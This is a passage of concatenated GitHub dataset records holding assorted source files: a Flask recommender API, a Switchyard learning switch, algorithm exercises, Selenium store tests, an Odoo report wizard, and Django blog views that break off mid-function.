}]\r\n },\r\n style_function=lambda x: {\r\n 'color': 'black',\r\n 'weight': 2,\r\n 'fillColor': '#ffae42',\r\n 'fillOpacity': 0.7\r\n }\r\n ).add_to(mapa)\r\n\r\n output = output + \".html\"\r\n mapa.save(output)","repo_name":"barricadadigital/GeoWifi","sub_path":"mapacalor.py","file_name":"mapacalor.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37992017098","text":"import pandas as pd\nfrom script_calc import Calc\n\npd.set_option('display.max_columns', 500)\npd.set_option('display.max_rows', 500)\npd.set_option('display.width', 500)\n\nc = Calc()\ndata = c.load_data('LGI_Homes')\nrevenue = c.get_line(data, c.income_statement, 'Home sales', 'Sales')\ncost_of_sales = c.get_line(data, c.income_statement, 'Cost of sales', 'Cost of Sales')\nga = c.get_line(data, c.income_statement, 'General and administrative', 'G&A')\nprofit = c.get_line(data, c.income_statement, 'Net income', 'Profit')\noperating_cash_flow = c.get_line(data, c.cash_flow, 'operating activities', 'Operating Cash Flow')\neps = c.get_line(data, c.income_statement, 'Diluted', 'Diluted EPS')\ninventory = c.get_line(data, c.balance_sheet, 'Real estate inventory', 'Inventory')\nassets_less_cash = c.get_and_operate_on_lines(data, c.balance_sheet, ['Total assets',\n 'Cash and cash equivalents'],\n 'Assets less Cash',\n False)\nequity = c.get_line(data, c.balance_sheet, 'Total equity', 'Equity')\nowners_earnings = c.get_and_operate_on_lines(data, c.cash_flow, ['Net income',\n 'Depreciation',\n 'Purchases',\n 'business acquisition',\n 'unconsolidated'],\n \"Owner's Earnings\")\nretained_earnings = c.get_line(data, c.balance_sheet, 'Retained earnings', 'Retained Earnings')\n\nresults = pd.concat([revenue,\n cost_of_sales,\n ga,\n profit,\n inventory,\n assets_less_cash,\n equity]).dropna(axis=1)\n\n# Earnings\nearnings = pd.concat([revenue,\n profit,\n owners_earnings,\n retained_earnings,\n eps,\n operating_cash_flow]).dropna(axis=1)\n# ratios\nratios = c.operate_on_results_onto_new_df(results, pd.DataFrame(), 'G&A', 'Sales', c.divide, 'G&A Margin')\nratios = c.operate_on_results_onto_new_df(results, ratios, 'Cost of Sales', 'Inventory', c.divide, 'Inventory Turnover')\n\n# Returns\nreturns = c.operate_on_results_onto_new_df(results, pd.DataFrame(), 'Profit', 'Assets less Cash', c.divide, 'ROALC')\nreturns = c.operate_on_results_onto_new_df(results, returns, 'Profit', 'Equity', c.divide, 'ROE')\n\nprint(earnings)\nprint(ratios)\nprint(returns)\n","repo_name":"zenonfoo/portfolio","sub_path":"financial_statement_scrape_2/statements/LGI_Homes/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3303461043","text":"def max_finder(seq):\r\n\ttracker = [0 for i in range(len(seq))]\r\n\tmax_count = 0\r\n\tfor i in range(1, len(tracker)):\r\n\t\tif seq[i] > seq[i-1]:\r\n\t\t\ttracker[i] = tracker[i-1] + 1\r\n\t\telse:\r\n\t\t\ttracker[i] = 0\r\n\tfor i in range(1, len(tracker)):\r\n\t\tif tracker[i] == 0:\r\n\t\t\tif seq[i-2] < seq[i]:\r\n\t\t\t\tif i+1 < len(seq) and 0 in tracker[i+1:]:\r\n\t\t\t\t\taddable = tracker[tracker.index(0, i+1) - 1]\r\n\t\t\t\telse:\r\n\t\t\t\t\taddable = tracker[-1]\r\n\t\t\t\ttemp_max = tracker[i-1] + addable\r\n\t\t\t\tif temp_max > max_count:\r\n\t\t\t\t\tmax_count = temp_max\r\n\t\t\tif i+1 < len(seq) and seq[i-1] < seq[i+1]:\r\n\t\t\t\tif i+1 < len(seq) and 0 in tracker[i+1:]:\r\n\t\t\t\t\taddable = tracker[tracker.index(0, i+1) - 1]\r\n\t\t\t\telse:\r\n\t\t\t\t\taddable = tracker[-1]\r\n\t\t\t\ttemp_max = tracker[i-1] + addable\r\n\t\t\t\tif temp_max > max_count:\r\n\t\t\t\t\tmax_count = temp_max\r\n\tif max_count == 0:\r\n\t\tmax_count = max(tracker)\r\n\t\tif max_count == 0:\r\n\t\t\treturn 0\r\n\treturn max_count + 1\r\n\t\t\t\r\nuseless = input()\t\t\r\nnumbers = input().split()\r\nfor i in range(len(numbers)):\r\n\tnumbers[i] = int(numbers[i])\r\nprint(max_finder(numbers))","repo_name":"Infinidrix/competitive-programming","sub_path":"Day 17/q4_improved.py","file_name":"q4_improved.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43517408852","text":"# 세준이는 정수 S와 K가 주어졌을 때, 합이 S인 K개의 양의 정수를 찾으려고 한다. 만약 여러개일 경우 그 곱을 가능한 최대로 하려고 한다.\r\n#\r\n# 가능한 최대의 곱을 출력한다.\r\n#\r\n# 만약 S=10, K=3이면, 3,3,4는 곱이 36으로 최대이다.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nS, K = map(int, input().strip().split())\r\narr = [S // K for i in range(K)]\r\n\r\nwhile True:\r\n if sum(arr) == S:\r\n break\r\n else:\r\n arr[-1] += 1\r\n arr.sort(reverse = True)\r\n\r\nresult = 1\r\nfor i in arr:\r\n result *= i\r\nprint(result)","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"1000~1999/1500.py","file_name":"1500.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33303371249","text":"from Utils import get_config, CONFIG_FILE\nfrom XAIRecommender import XAIRecommender\nfrom XAIRInitializer import XAIRInitializer\nfrom flask import Flask, request, send_from_directory\nfrom flask_cors import CORS\n\n# using flask instead of flask_restful, since there are only two routes\napp = Flask(__name__)\n\n# allowing all http requests and origins\ncors = CORS(app)\n\nrecommender = XAIRecommender(verbose=False, reload=True)\n\n\n@app.route('/xairecommender', methods=[\"POST\"])\ndef post():\n \"\"\"\n Receives POST request (e.g. from frontend application)\n @returns recommendation object for given request parameters\n \"\"\"\n\n validator = recommender.rec_sim.input_validator\n\n inputs = request.get_json()\n\n\n if not validator.validate(inputs):\n return validator.errors, 400\n\n recommendation, inputs_processed = recommender.make_recommendation(inputs, return_inputs=True)\n\n excl = recommender.get_method_information()[1]\n html, _ = recommender.get_active_rules()\n\n return {\n \"recommendation\": recommendation,\n \"active_rules\": html,\n \"excluded_methods\": excl,\n \"inputs_orig\": inputs,\n \"inputs_processed\": inputs_processed\n }\n\n\n@app.route(\"/config\", methods=[\"GET\"])\ndef get_configuration():\n \"\"\"\n Get recommendation for given ID\n \"\"\"\n dir, file_name = get_config().resource_files.frontend_input_config.rsplit(\"/\", 1)\n print(f\"dir: {dir}, file: {file_name}\")\n return send_from_directory(dir, file_name)\n\n\nif __name__ == '__main__':\n # run webapp\n app.run(debug=True, host=\"0.0.0.0\", port=5000, threaded=True)\n","repo_name":"viadee/xair","sub_path":"xai_xps/src/starter_webapp.py","file_name":"starter_webapp.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"15763998344","text":"#! /usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nsns.set()\n#%%\n# k = 0\nnx, nt = 500, 500\n\neps = 1E-3\n\nliP = [0.99, -0.99, 0.01]\n\nRESes = []\nT_spec = [ np.linspace(0 + 0.01, 0 + 0.28 , nt),\n np.linspace(0 + 0.01, 0 + 0.28 , nt),\n np.linspace(0 + 0.01, 0 + 0.28 , nt)\n ]\nfor kP in range(len(liP)):\n P = liP[kP]\n P_res = []\n for kTv in T_spec[kP]:\n while True:\n dx = 1/nx # each slice\n # print(dx)\n nume, deli = 0, 0\n\n for k in range(nx):\n x = k*dx # current loc\n ak = 1.5*x**2 - 0.5\n bk = ak / (kTv)\n nume += ak*np.exp(bk*P)\n deli += np.exp(bk*P)\n P_src = P\n P = nume / deli\n if np.abs(P_src - P) < eps:\n P_res.append(P)\n break\n RESes.append(P_res)\n print(\"Init point: % 5.3f\"%P)\n for k in np.arange(0,len(T_spec[kP])):\n print(\"% 5.5f\"%T_spec[kP][k], \" : \", \"% 5.5f\"%P_res[k])\n\n#%%\nplt.figure(figsize = (10,7))\nplt.plot(T_spec[0], RESes[0], '-', T_spec[1], RESes[1], '-',T_spec[2], RESes[2], '-')\nplt.show()\n","repo_name":"pigtamer/LCD_Assignment","sub_path":"entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21296155436","text":"'''\r\nEthernet learning switch in Python.\r\n\r\nNote that this file currently has the code to implement a \"hub\"\r\nin it, not a learning switch. (I.e., it's currently a switch\r\nthat doesn't learn.)\r\n'''\r\nimport switchyard\r\nfrom switchyard.lib.userlib import *\r\n\r\n\r\ndef main(net: switchyard.llnetbase.LLNetBase):\r\n my_interfaces = net.interfaces()\r\n mymacs = [intf.ethaddr for intf in my_interfaces]\r\n\r\n # Table!!\r\n trtable = {}\r\n\r\n while True:\r\n try:\r\n _, fromIface, packet = net.recv_packet()\r\n except NoPackets:\r\n continue\r\n except Shutdown:\r\n break\r\n\r\n log_debug (f\"In {net.name} received packet {packet} on {fromIface}\")\r\n eth = packet.get_header(Ethernet)\r\n\r\n # Table!!\r\n if (eth.src in trtable) == False:\r\n if len(trtable) == 5:\r\n k = min(trtable.items(), key=lambda x: x[1][1])[0]\r\n trtable.pop(k)\r\n trtable[eth.src] = [fromIface, 0]\r\n\r\n\r\n if eth is None:\r\n log_info(\"Received a non-Ethernet packet?!\")\r\n return\r\n if eth.dst in mymacs:\r\n log_info(\"Received a packet intended for me\")\r\n continue\r\n\r\n # Table!!\r\n if eth.dst in trtable:\r\n target = trtable.get(eth.dst)[0]\r\n trtable.get(eth.dst)[1] += 1\r\n log_info (f\"Get MAC from mytable, MAC: {eth.dst} is at {target}\")\r\n log_info (f\"Send packet {packet} to {target}\")\r\n net.send_packet(target, packet)\r\n else:\r\n for intf in my_interfaces:\r\n if fromIface!= intf.name:\r\n log_info (f\"Flooding packet {packet} to {intf.name}\")\r\n net.send_packet(intf, packet)\r\n\r\n print (trtable)\r\n net.shutdown()\r\n","repo_name":"SonicoGO/Computer-Network","sub_path":"lab-02-Switch/myswitch_traffic.py","file_name":"myswitch_traffic.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725298066","text":"\"\"\"\n给定一个二维网格board和一个字典中的单词列表 words,找出所有同时在二维网格和字典中出现的单词。\n\n单词必须按照字母顺序,通过相邻的单元格内的字母构成,\n其中“相邻”单元格是那些水平相邻或垂直相邻的单元格。同一个单元格内的字母在一个单词中不允许被重复使用。\n\n输入:\nwords = [\"oath\",\"pea\",\"eat\",\"rain\"] and board =\n[\n ['o','a','a','n'],\n ['e','t','a','e'],\n ['i','h','k','r'],\n ['i','f','l','v']\n]\n\n输出:[\"eat\",\"oath\"]\n\"\"\"\n\nclass Solution:\n def findWords(self, board, words):\n trie = {}\n\n for word in words:\n node = trie\n\n # 针对每个单词,构造它的字典树\n for char in word:\n if char not in node:\n node[char] = {}\n node = node[char]\n node[\"finish\"] = word\n\n # 由于我们在下面,会把添加完单词的trie剪枝,所以不用担心会添加到重复答案的问题\n self.res = []\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j] in trie:\n self.dfs(i, j, trie, board)\n\n return self.res\n\n def dfs(self, i, j, node, board):\n cur = board[i][j]\n \"\"\"\n 1.\n 一个单词的最后一个字母的子节点只有{finish:word}了\n 假如已经遍历到一个单词的最后一个字母了, pop则返回这个单词, 并记录这个单词\n 假如没有遍历到一个单词的最后一个字母,pop则返回默认值False\n 题目潜在假设,一个单词在一个表只能被找到一次,所以我们把这个单词找到后,pop掉单词\n 例如 {a:{b:{finish:ab}}} -> {a:{b:{}}}, 然后在下面2处进行清理\n \"\"\"\n isLast = node[cur].pop(\"finish\", False)\n if isLast:\n self.res.append(isLast)\n\n # 本次dfs遍历过这个点,标记,在本次不会再被访问\n board[i][j] = \"#\"\n for x, y in [[-1, 0], [1, 0], [0, -1], [0, 1]]:\n newi = i + x\n newj = j + y\n\n # 当满足所有条件的时候,我们可以把元素加进去\n if 0 <= newi <= len(board) - 1 and 0 <= newj <= len(board[0]) - 1 and board[newi][newj] in node[cur]:\n self.dfs(newi, newj, node[cur], board)\n # 本次dfs遍历完成,解除标记,在下个dfs会被再使用\n board[i][j] = cur\n\n \"\"\"\n 2. 假如存在形如这种的trie, 则把b:{}给pop掉,以减少下次查询的长度\n {a:{b:{}}} -> {a:{}}\n \"\"\"\n if node[cur] == {}:\n node.pop(cur)\n\n# 链接:https://leetcode.cn/problems/word-search-ii/solution/python3-dfs-by-trojanmaster-7zmx/\n# 古城算法的超时了","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Trie(字典树)/212. 单词搜索 II(字典树,dfs,剪枝).py","file_name":"212. 单词搜索 II(字典树,dfs,剪枝).py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27836309464","text":"import numpy as np\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n# from rake_nltk import Rake\nimport json\nimport re\nfrom nltk import ngrams\n\nstop_words = set(stopwords.words('english'))\n\nmin_thresh_len = 50\n\nMIN_WORDS=3\nwith open(\"act_ngrams.json\",'r') as f:\n act_ngram = json.load(f)\n\n################## Methods ###################\n# query 1 -> minimal number of stopwords ratio\n# query 2 -> ACT or abberviations match\n# query 3 -> v, vs, versus comes in middle\n# query 4 -> long para, stopwords ratio more\n##############################################\n\n# def hasNumbers(string) :\n# return bool(re.search(r'\\d', string))\n\ndef is_query2(query):\n query = query.lower()\n\n fd = open('abbreviation_mapping.json')\n\n abberviations = json.load(fd)\n\n query_words = re.split(' |, |\\. ', query)\n\n query = re.sub(\n r\"[(),-]\",\n \"\",\n query\n )\n\n grams = ngrams(query.split(), MIN_WORDS)\n for gram in grams:\n gram = ' '.join(gram)\n if gram in act_ngram:\n return 2\n\n if \"act\" in query_words or \"bill\" in query_words:\n return 2\n\n for key in abberviations:\n if key.lower() in query_words and key.lower() not in stop_words:\n return 2\n\n return -1\n\n\ndef is_query3(query):\n query = query.lower()\n\n query = query.replace('.', '')\n\n if query.find(\" v \") != -1 or query.find(\" vs \") != -1 or query.find(\" versus \") != -1:\n return 3\n else:\n return -1\n\n\ndef is_query4(query):\n query = query.lower()\n\n query_words = re.split(', |\\. | ', query)\n\n stop_count = 0\n count = 0\n\n for word in query_words:\n if word == \"\":\n continue\n if word in stop_words:\n stop_count += 1\n count += 1\n\n stop_count /= count\n\n if stop_count > 0.3:\n return 4\n else:\n return -1\n\n\ndef query_identifier(query):\n # query 2\n query = query.strip()\n type_of_query = is_query2(query)\n\n if type_of_query is 2:\n return type_of_query\n\n # query 3\n type_of_query = is_query3(query)\n\n if type_of_query is 3:\n return type_of_query\n\n # query 4\n type_of_query = is_query4(query)\n\n if type_of_query is 4:\n return type_of_query\n\n return 1","repo_name":"142ayushkumar/LegalAssistant","sub_path":"Abbreviations/query_identifier.py","file_name":"query_identifier.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10825650696","text":"import os\nimport pandas as pd\n\n\ndef write_sample_csv():\n d = {\n \"truck\": \"Ford\",\n \"description\": {\n \"features\": {\n \"steering\": \"4 wheel drive\",\n \"engine\": \"8-cylinders\",\n \"climate\": \"Air Conditioning\",\n },\n },\n \"year\": 2022,\n \"cost\": 42341.99,\n }\n df = pd.DataFrame(d)\n df.to_csv(\"example.csv\", index=False)\n print(\"...csv written\")\n\n\ndef main():\n if \"example.csv\" not in os.listdir(\"./\"):\n print(\"writing csv...\")\n write_sample_csv()\n\n df = pd.read_csv(\"example.csv\")\n\n print(\"writing parquet file...\")\n df.to_parquet(\"example.parquet.gzip\", compression=\"gzip\")\n print(\"...parquet file written\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/parquet/pandas_to_parquet.py","file_name":"pandas_to_parquet.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"39997877553","text":"'''\n1000-digit Fibonacci number\nProblem 25\nThe Fibonacci sequence is defined by the recurrence relation:\n\nFn = Fn−1 + Fn−2, where F1 = 1 and F2 = 1.\nHence the first 12 terms will be:\n\nF1 = 1\nF2 = 1\nF3 = 2\nF4 = 3\nF5 = 5\nF6 = 8\nF7 = 13\nF8 = 21\nF9 = 34\nF10 = 55\nF11 = 89\nF12 = 144\nThe 12th term, F12, is the first term to contain three digits.\n\nWhat is the first term in the Fibonacci sequence to contain 1000 digits? '''\n\nf1 = 1\nf2 = 1\nn = 2\n\nwhile (True):\n n = n + 1\n fn = f1 + f2\n f1 = f2\n f2 = fn\n\n # print(fn)\n if fn > pow(10, 999):\n print(\"term=\", n)\n print(\"Number=\", fn)\n break\n","repo_name":"murli777/Project-Euler-Solutions","sub_path":"src/001-050/P025.py","file_name":"P025.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34898207831","text":"# -*- coding: utf-8 -*-\n# © 2008-2014 Alistek\n# © 2016 Savoir-faire Linux\n# License GPL-3.0 or later (http://www.gnu.org/licenses/gpl).\n\nfrom odoo.tools.translate import _\nfrom odoo import api, fields, models\n\n\nclass AerooAddPrintButton(models.TransientModel):\n \"\"\"\n Add Print Button\n \"\"\"\n\n _name = 'aeroo.add_print_button'\n _description = __doc__\n\n @api.model\n def _default_state(self):\n ctx = self.env.context\n if 'active_model' not in ctx or 'active_id' not in ctx:\n return None\n\n report = self.env[ctx['active_model']].browse(ctx['active_id'])\n vals = self.env['ir.values'].search([\n ('value', '=', report.type + ',' + str(report.id))\n ])\n if not vals:\n return 'add'\n else:\n return 'exist'\n\n open_action = fields.Boolean('Open added action')\n state = fields.Selection([\n ('add', 'Add'),\n ('exist', 'Exist'),\n ('done', 'Done'),\n ], 'State', readonly=True, default=_default_state)\n\n @api.multi\n def do_action(self):\n self.ensure_one()\n ctx = self.env.context\n assert 'active_model' in ctx and 'active_id' in ctx\n report = self.env[ctx['active_model']].browse(ctx['active_id'])\n event_id = self.env['ir.values'].set_action(\n report.report_name, 'client_print_multi',\n report.model, 'ir.actions.report.xml,%d' % ctx['active_id'])\n self.write({'state': 'done'})\n if not self.open_action:\n return {\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'res_model': self._name,\n 'target': 'new',\n }\n\n action = self.env.ref('base.act_values_form_action')\n\n return {\n 'name': _('Client Events'),\n 'type': action.type,\n 'res_model': action.res_model,\n 'view_type': action.view_type,\n 'view_mode': action.view_mode,\n 'search_view_id': action.search_view_id.id,\n 'domain': [('id', '=', event_id)],\n 'context': action.context,\n }\n","repo_name":"decodio/community10","sub_path":"report_aeroo/wizard/add_print_button.py","file_name":"add_print_button.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6659661065","text":"#!/usr/bin/env python\n\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport settings\nfrom helpers import actions, auth, selectors\n\n\nclass HomePageTest(unittest.TestCase):\n\n @auth.logged_customer\n def test_search_from_home_page_as_customer(self):\n self.search_from_home_page(title=\"My Store\",\n query=\"CHIFFON\")\n\n @auth.anonymous\n def test_search_from_home_page_as_guest(self):\n self.search_from_home_page(title=\"My Store\",\n query=\"CHIFFON\")\n\n @auth.logged_customer\n def test_add_item_to_cart_from_homepage_as_customer(self):\n self.add_to_cart_from_home_page()\n\n @auth.anonymous\n def test_add_item_to_cart_from_homepage_as_guest(self):\n self.add_to_cart_from_home_page()\n\n @auth.logged_customer\n def test_quick_view_from_homepage_as_customer(self):\n self.open_quick_view(logged_in=True)\n\n @auth.anonymous\n def test_quick_view_from_homepage_as_guest(self):\n self.open_quick_view(logged_in=False)\n\n def setUp(self):\n self.config = settings.config\n self.driver = webdriver.Chrome(executable_path=self.config['selenium']['Chrome']['driver_path'])\n self.driver.get(self.config['website']['homepage'])\n self.wait = WebDriverWait(self.driver, 10)\n\n def search_from_home_page(self, title, query):\n driver = self.driver\n self.assertIn(title, driver.title)\n products = actions.search(driver, query)\n assert len(products) == 2\n\n def add_to_cart_from_home_page(self):\n product = selectors.get_all_products_on_page(self.driver)[0]\n actions.add_product_to_cart(self.driver, self.wait, product)\n\n def open_quick_view(self, logged_in=False):\n driver = self.driver\n product_element = selectors.get_all_products_on_page(driver)[1]\n hover_action = ActionChains(self.driver).move_to_element(product_element)\n hover_action.perform()\n quick_view_button = self.wait.until(\n EC.visibility_of_element_located((By.XPATH, '//*[@id=\"homefeatured\"]/li[2]/div/div[1]/div/a[2]'))\n )\n quick_view_button.click()\n\n quick_view_iframe = self.wait.until(\n EC.visibility_of_element_located((By.CLASS_NAME, \"fancybox-iframe\"))\n )\n driver.switch_to.frame(quick_view_iframe)\n\n wishlist_button = driver.find_element_by_id(\"wishlist_button\")\n wishlist_button.click()\n message = self.wait.until(\n EC.visibility_of_element_located((By.CLASS_NAME, \"fancybox-error\"))\n )\n if not logged_in:\n assert message.text == \"You must be logged in to manage your wishlist.\"\n else:\n assert message.text == \"Added to your wishlist.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main(warnings='ignore')\n","repo_name":"idobushovska/automation-store","sub_path":"test_case_home_page.py","file_name":"test_case_home_page.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21519775141","text":"import json\nimport boto3\nfrom botocore.client import Config\nfrom django.conf import settings\nfrom django.core.exceptions import MultipleObjectsReturned\nfrom django.core.mail import send_mail\nfrom django.core.paginator import Paginator\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.models import User\nimport tweepy as tw\nfrom django.views import View\n\nfrom textblob import TextBlob\nimport textwrap\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.contrib import messages\n\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom tracking_analyzer.models import Tracker\nfrom django.utils.text import slugify\n\nfrom .forms import PostForm, CommentsForm, CommentReplyForm, TrendsForm, get_trends, \\\n TwitterSearchForm, PhotoForm, PhotoStoryForm\nfrom .models import Post, Comments, CommentReply, Contact, Action, Photo, PhotoStory\nfrom .utils import summary, create_action, tag_list\nfrom django_currentuser.middleware import (\n get_current_user, get_current_authenticated_user)\nimport os\nfrom better_profanity import profanity\nfrom textblob import TextBlob\n\n\ndef search_blog(query=None):\n queryset = []\n queries = query.split(' ')\n for q in queries:\n posts = Post.objects.filter(\n Q(title__icontains=q) |\n Q(content__icontains=q))\n for post in posts:\n queryset.append(post)\n return list(set(queryset))\n\n\ndef search_view(request):\n context = {}\n query = ''\n if request.GET:\n query = request.GET['q']\n context['query'] = str(query)\n blog_posts = search_blog(query)\n context['object_list'] = blog_posts\n return render(request, 'blog/search.html', context)\n\n\ndef about(request):\n return render(request, 'blog/about.html')\n\n\ndef privacy(request):\n return render(request, 'blog/privacy.html')\n\n\ndef tnc(request):\n return render(request, 'blog/tnc.html')\n\n\nclass UserPostListView(ListView):\n model = Post\n template_name = 'blog/user_posts.html'\n context_object_name = 'object_list'\n paginate_by = 4\n\n def get_queryset(self):\n user = User.objects.get(id=self.kwargs['pk'])\n # first_name = self.kwargs.get('username').split(' ')[0]\n # try:\n # user = User.objects.get(first_name=first_name)\n # except (User.DoesNotExist, MultipleObjectsReturned):\n # user = User.objects.get(username=self.kwargs.get('username'))\n return Post.objects.filter(author=user).filter(draft=False).order_by('-publish')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n user = User.objects.get(id=self.kwargs['pk'])\n # user_ref = self.request.build_absolute_uri()\n # user_list = list(user_ref.split('/'))\n # user_name = user_list[len(user_list) - 2]\n # first_name = user_name.split('%')[0]\n # try:\n # first_name = User.objects.get(first_name=first_name).get_full_name()\n # except User.DoesNotExist:\n # first_name = User.objects.get(username=self.kwargs['username']).get_full_name()\n context['user_post'] = user.get_full_name()\n return context\n\n\nclass PostCreate(LoginRequiredMixin, CreateView):\n model = Post\n form_class = PostForm\n success_url = '/'\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n title = form.cleaned_data['title']\n title = form.cleaned_data['is_draft']\n form.instance.slug = slugify(title)\n # post needs to be vetted by the admin before making it public\n form.instance.draft = True\n # post = Post.objects.latest('publish')\n new_post = form.save(commit=False)\n new_post.save()\n followers = new_post.author.rel_to_set.all()\n emails = ['from.wetoowrite@gmail.com', ]\n\n for follower in followers:\n emails.append(follower.user_from.email)\n send_mail(f'{new_post.title}',\n f'A new article has been posted by {new_post.author.first_name},'\n f'click on https://www.wetoowrite.com{new_post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", emails)\n\n if new_post.is_draft:\n messages.success(self.request, f'Review Your article \"{title}\" in the Drafts tab!')\n\n else:\n create_action(self.request.user, \"Posted a new article\", new_post)\n messages.success(self.request, f'Your article \"{title}\" has been successfully uploaded for review!')\n send_mail(f'{new_post.title}',\n f'A new article has been posted by {new_post.author.first_name},'\n f'click on https://www.wetoowrite.com{new_post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", (\"from.wetoowrite@gmail.com\",))\n\n return super().form_valid(form)\n\n\n@login_required\ndef post_draft(request):\n object_list = Post.objects.filter(is_draft=True).filter(author=request.user)\n return render(request, 'blog/post_draft_list.html', {'object_list': object_list, 'title': 'draft'})\n\n\n@login_required\ndef post_draft_detail(request, pk):\n post = Post.objects.get(id=pk)\n return render(request, 'blog/post_draft.html', {'object': post, 'title': 'draft'})\n\n\n@login_required\ndef post_draft_update(request, pk):\n post = Post.objects.get(id=pk)\n form = PostForm(instance=post)\n if request.method == \"POST\":\n form = PostForm(request.POST, request.FILES)\n print(request.POST, request.FILES.getlist('cover'))\n if form.is_valid():\n posted = form.save(commit=False)\n posted.author = request.user\n posted.is_draft = True if form.cleaned_data['is_draft'] == 'on' else False\n # post.author = request.user\n # title = form.cleaned_data['title']\n # post.title = title\n # post.content = form.cleaned_data['content']\n # post.is_draft = form.cleaned_data['is_draft']\n # if form.cleaned_data['cover']:\n # post.cover = form.cleaned_data['cover']\n posted.save()\n if posted.is_draft:\n messages.success(request,\n f'{post.author.first_name} Click on Review to Edit Your article \"{post.title}\" !')\n return redirect('post-draft')\n\n else:\n create_action(request.user, \"Posted a new article\", post)\n messages.success(request, f'Your article \"{post.title}\" has been successfully uploaded for review!')\n send_mail(f'{post.title}',\n f'A new article has been posted by {post.author.first_name},'\n f'click on https://www.wetoowrite.com{post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", (\"from.wetoowrite@gmail.com\",))\n return redirect('blog-home')\n\n return render(request, 'blog/post_form.html', {'form': form})\n\n\nclass PostUpdate(UpdateView):\n model = Post\n form_class = PostForm\n # success_url = '/post-draft'\n template_name = 'blog/post_form.html'\n\n # def form_valid(self, form):\n # post = Post.objects.get(id=self.kwargs['pk'])\n # is_draft = form.cleaned_data['is_draft']\n # return super(PostUpdate, self).form_valid(form)\n\n def get_success_url(self):\n post = Post.objects.get(id=self.kwargs['pk'])\n if post.is_draft:\n messages.success(self.request,\n f'{post.author.first_name} Click on Review to Edit Your article \"{post.title}\" !')\n url = reverse('post-draft')\n return url\n\n else:\n create_action(self.request.user, \"Posted a new article\", post)\n messages.success(self.request, f'Your article \"{post.title}\" has been successfully uploaded for review!')\n send_mail(f'{post.title}',\n f'A new article has been posted by {post.author.first_name},'\n f'click on https://www.wetoowrite.com{post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", (\"from.wetoowrite@gmail.com\",))\n\n url = reverse('blog-home')\n return url\n\n\nclass PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Post\n success_url = '/'\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\n@login_required\ndef post_delete(request, pk):\n post = Post.objects.get(id=pk)\n return render(request, 'blog/post_confirm_delete.html', {'object': post})\n\n\n@login_required\ndef delete_post(request, pk):\n post = Post.objects.get(id=pk)\n post.draft = True\n post.save()\n return redirect('blog-home')\n\n\nclass PostListView(ListView):\n model = Post\n paginate_by = 4\n\n def get(self, request, *args, **kwargs):\n self.object_list = Post.objects.filter(draft=False)\n article = Post.objects.last()\n try:\n Tracker.objects.create_from_request(request, article)\n except AssertionError:\n pass\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n context = 